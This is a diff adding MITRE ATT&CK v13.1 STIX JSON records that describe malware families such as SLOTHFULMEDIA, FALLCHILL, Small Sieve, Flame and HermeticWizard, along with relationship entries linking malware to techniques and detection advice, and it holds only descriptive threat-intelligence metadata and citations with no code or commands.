a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90.json new file mode 100644 index 0000000000000000000000000000000000000000..d54084a363fc8e26db94611975ab9d822d12d217 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--cc2b68a7-6fea-41b8-b663-267e4120da83", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_aliases": [ + "SLOTHFULMEDIA", + "JackOfHearts", + "QueenOfClubs" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90", + "type": "malware", + "created": "2020-11-16T23:23:00.729Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0533", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0533" + }, + { + "source_name": "JackOfHearts", + "description": "Kaspersky Labs refers to the \"mediaplayer.exe\" dropper within [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) as the JackOfHearts.(Citation: Kaspersky IAmTheKing October 2020)" + }, + { + "source_name": "QueenOfClubs", + "description": "Kaspersky Labs assesses [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is an older variant of a malware family it refers to as the QueenOfClubs.(Citation: Kaspersky IAmTheKing October 2020)" + }, + { + "source_name": "CISA MAR SLOTHFULMEDIA October 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "description": "DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 \u2013 Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020." + }, + { + "source_name": "Costin Raiu IAmTheKing October 2020", + "url": "https://twitter.com/craiu/status/1311920398259367942", + "description": "Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020." + }, + { + "source_name": "USCYBERCOM SLOTHFULMEDIA October 2020", + "url": "https://twitter.com/CNMF_CyberAlert/status/1311743710997159953", + "description": "USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020." + }, + { + "source_name": "Kaspersky IAmTheKing October 2020", + "url": "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/", + "description": "Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020." + }, + { + "source_name": "ESET PowerPool Code October 2020", + "url": "https://twitter.com/ESETresearch/status/1311762215490461696", + "description": "ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020." + } + ], + "modified": "2021-04-13T20:44:14.476Z", + "name": "SLOTHFULMEDIA", + "description": "[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified \"sophisticated cyber actor\" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020) \n\nIn October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as \"IAmTheKing\".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as \"PowerPool\".(Citation: ESET PowerPool Code October 2020) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fece06b7-d4b1-42cf-b81a-5323c917546e.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fece06b7-d4b1-42cf-b81a-5323c917546e.json new file mode 100644 index 0000000000000000000000000000000000000000..b8d508e66b4a0d2ee990eaca8ff0466225c3d6e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fece06b7-d4b1-42cf-b81a-5323c917546e.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--da3e7237-2cc7-4637-9dda-fd64f5ad3e8c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "FALLCHILL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fece06b7-d4b1-42cf-b81a-5323c917546e", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0181", + "external_id": "S0181" + }, + { + "source_name": "FALLCHILL", + "description": "(Citation: US-CERT FALLCHILL Nov 2017)" + }, + { + "url": "https://www.us-cert.gov/ncas/alerts/TA17-318A", + "description": "US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.", + "source_name": "US-CERT FALLCHILL Nov 2017" + } + ], + "modified": "2021-04-23T20:01:10.366Z", + "name": "FALLCHILL", + "description": "[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5.json new file mode 100644 index 0000000000000000000000000000000000000000..370bf91780bf3eef30bf5a0515cc886102b9f219 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--5e3d0a2a-9c4d-4e21-98a4-ddc79a95f64e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-14T15:24:24.129Z", + "name": "Small Sieve", + "description": "[Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)\n\nSecurity researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Small Sieve", + "GRAMDOOR" + ], + "type": "malware", + "id": "malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5", + "created": "2022-08-16T19:16:48.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1035", + "external_id": "S1035" + }, + { + "source_name": "GRAMDOOR", + "description": "(Citation: Mandiant UNC3313 Feb 2022)" + }, + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + }, + { + "source_name": "NCSC GCHQ Small Sieve Jan 2022", + "description": "NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.", + "url": "https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf" + }, + { + "source_name": "Mandiant UNC3313 Feb 2022", + "description": "Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.", + "url": "https://www.mandiant.com/resources/telegram-malware-iranian-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json new file mode 100644 index 0000000000000000000000000000000000000000..d2ac61e1092d81ac260af4cf2b3ee056214f4f09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--d1ffc22f-9cfa-4fb3-b8c1-fa44ba8da8f8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:51:18.408Z", + "name": "Flame", + "description": "[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "type": "malware", + "id": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "created": "2017-05-31T21:33:21.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0143", + "external_id": "S0143" + }, + { + "source_name": "Flame", + "description": "(Citation: Kaspersky Flame)" + }, + { + "source_name": "sKyWIper", + "description": "(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)" + }, + { + "source_name": "Flamer", + "description": "(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)" + }, + { + "source_name": "Kaspersky Flame", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/" + }, + { + "source_name": "Crysys Skywiper", + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "url": "https://www.crysys.hu/publications/files/skywiper.pdf" + }, + { + "source_name": "Symantec Beetlejuice", + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.", + "url": "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa.json new file mode 100644 index 0000000000000000000000000000000000000000..10d507e2227e99d45ce4fa16f2d5be74a3b4a638 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f789c8c6-f1eb-4e99-8b1d-85efb9bf734d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HermeticWizard" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa", + "created": "2022-03-25T20:47:06.942Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0698", + "url": "https://attack.mitre.org/software/S0698" + }, + { + "source_name": "ESET Hermetic Wizard March 2022", + "url": "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine", + "description": "ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)", + "modified": "2022-04-11T00:11:44.579Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "HermeticWizard", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/enterprise-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..08c9a6bd16f65cb18eabaa77615f506faacc4754 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--6c91f9c3-0b14-4ef6-9e51-5e0f6859a8a0", + "spec_version": "2.0", + "objects": [ + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912.json new file mode 100644 index 0000000000000000000000000000000000000000..179163f8eb3245e5bf06d46da46cc0b27d4b261c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--1f671a55-f788-4a4d-9006-a7a5cc1be11d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912", + "type": "relationship", + "created": "2021-04-27T01:56:35.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Volatile Cedar March 2015", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf", + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021." + } + ], + "modified": "2021-04-27T01:56:35.810Z", + "description": " [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) ", + "relationship_type": "uses", + "source_ref": "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00069454-a469-4905-97fd-b4057e86d29b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00069454-a469-4905-97fd-b4057e86d29b.json new file mode 100644 index 0000000000000000000000000000000000000000..684bfb6eeb522c97b77c0b6723e56e9fe1356331 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00069454-a469-4905-97fd-b4057e86d29b.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e29a8885-59e1-480a-a83f-3e6a0ef594c3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00069454-a469-4905-97fd-b4057e86d29b", + "type": "relationship", + "created": "2022-03-30T14:26:51.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.834Z", + "description": "Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8.json new file mode 100644 index 0000000000000000000000000000000000000000..e39b793ee342aa81614036d71abeed5d26dadd43 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--12dbdc2a-0336-4c8c-9a93-eff6d0d6dd5b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8", + "type": "relationship", + "created": "2021-09-15T18:02:37.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec WastedLocker June 2020", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "description": "Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021." + } + ], + "modified": "2021-09-15T18:02:37.631Z", + "description": "[Indrik Spider](https://attack.mitre.org/groups/G0119) used [Cobalt Strike](https://attack.mitre.org/software/S0154) to carry out credential dumping using ProcDump.(Citation: Symantec WastedLocker June 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07", + "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00192a5f-9dc0-445a-b010-d77bd08aac93.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00192a5f-9dc0-445a-b010-d77bd08aac93.json new file mode 100644 index 0000000000000000000000000000000000000000..07340751bd18ed1c61458efc4313fd1cd1ba9866 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00192a5f-9dc0-445a-b010-d77bd08aac93.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--f2f9e75a-b164-4712-bb6a-e01970e9cac4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00192a5f-9dc0-445a-b010-d77bd08aac93", + "type": "relationship", + "created": "2021-05-26T14:50:00.881Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry CostaRicto November 2020", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021." + }, + { + "source_name": "FireEye FiveHands April 2021", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021." + }, + { + "source_name": "CISA AR21-126A FIVEHANDS May 2021", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021." + } + ], + "modified": "2021-06-08T13:29:06.838Z", + "description": "[SombRAT](https://attack.mitre.org/software/S0615) can SSL encrypt C2 traffic.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)", + "relationship_type": "uses", + "source_ref": "malware--425771c5-48b4-4ecd-9f95-74ed3fc9da59", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9.json new file mode 100644 index 0000000000000000000000000000000000000000..e67b87302420ff547c4b2548c58e7562f651b648 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--93fc73c1-4625-487c-b531-ebc13ae23b1e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--001ecf24-8276-40d2-ba05-2d20e5c53ec9", + "type": "relationship", + "created": "2021-03-26T16:48:31.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "MSTIC NOBELIUM Mar 2021", + "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021." + } + ], + "modified": "2021-03-26T16:48:31.963Z", + "description": "[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)", + "relationship_type": "uses", + "source_ref": "malware--b7010785-699f-412f-ba49-524da6033c76", + "target_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002142e4-3942-4c6d-913d-814c1fc93380.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002142e4-3942-4c6d-913d-814c1fc93380.json new file mode 100644 index 0000000000000000000000000000000000000000..730a9716c5d6c80e7ea9402e000f61f87e694506 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--002142e4-3942-4c6d-913d-814c1fc93380.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--cebf1249-616f-4f30-85e4-5b2353f25095", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--002142e4-3942-4c6d-913d-814c1fc93380", + "created": "2022-04-14T16:36:05.395Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Periodically baseline instances to identify malicious modifications or additions.", + "modified": "2022-04-14T16:36:05.395Z", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9.json new file mode 100644 index 0000000000000000000000000000000000000000..955b1d87e8b48cf69f71596e3964d037f690d08d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--267a1f4f-06ad-459d-9861-24964174c7db", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9", + "type": "relationship", + "created": "2021-05-17T19:42:12.789Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021." + } + ], + "modified": "2021-10-18T19:54:13.353Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to accept a value for HTTP Host Header to enable domain fronting.(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b.json new file mode 100644 index 0000000000000000000000000000000000000000..5a1e7f2ae592a8b11621c61887d221b9beb48dd5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--27438f4a-74fb-4377-bbdd-0ef46e1385d8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 